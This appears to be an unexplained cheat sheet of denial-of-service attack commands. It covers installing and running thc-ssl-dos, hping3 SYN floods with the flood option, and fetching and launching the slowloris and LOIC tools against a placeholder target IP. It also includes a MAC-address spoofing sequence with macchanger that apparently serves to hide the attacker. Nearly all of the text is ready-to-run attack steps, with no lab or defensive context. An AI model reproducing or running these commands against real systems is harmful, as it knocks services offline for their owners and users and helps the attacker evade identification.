sudo apt update
sudo apt install thc-ssl-dos
sudo thc-ssl-dos <target_ip> (use 2nd command)
OR
sudo thc-ssl-dos <target_ip> - - accept
sudo hping3 --icmp --count 10 [Link]
hping3 --icmp --count 10 [target IP address]
hping3 -S [target IP address] -p [target port] --flood
hping3 -S [target IP address] -p ++1
========
hping3 -S -p 80 -s 1337 -c 10000 <target_ip>
● -S: SYN flag.
● -p 80: Target port (HTTP in this case).
● -s 1337: Source port.
● -c 10000: Number of packets to send.
● <target_ip>: The IP address of the target.
=====================================
[Link]
git clone [Link]
cd slowloris
python3 [Link] [Link]
===============
# Identify the interface
ip link
# Bring down the interface
sudo ifconfig eth0 down
# Change the MAC address
sudo macchanger -m 00:11:22:33:44:55 eth0
# Bring up the interface
sudo ifconfig eth0 up
# Verify the change
ip link show eth0
=========================
[Link]
[Link]
(download loic and extract this to desktop)
sudo apt-get install mono-complete
sudo apt-get install nload
mono [Link]
[Link]
%E2%80%99s-dictionary-cyber-security-terminologies/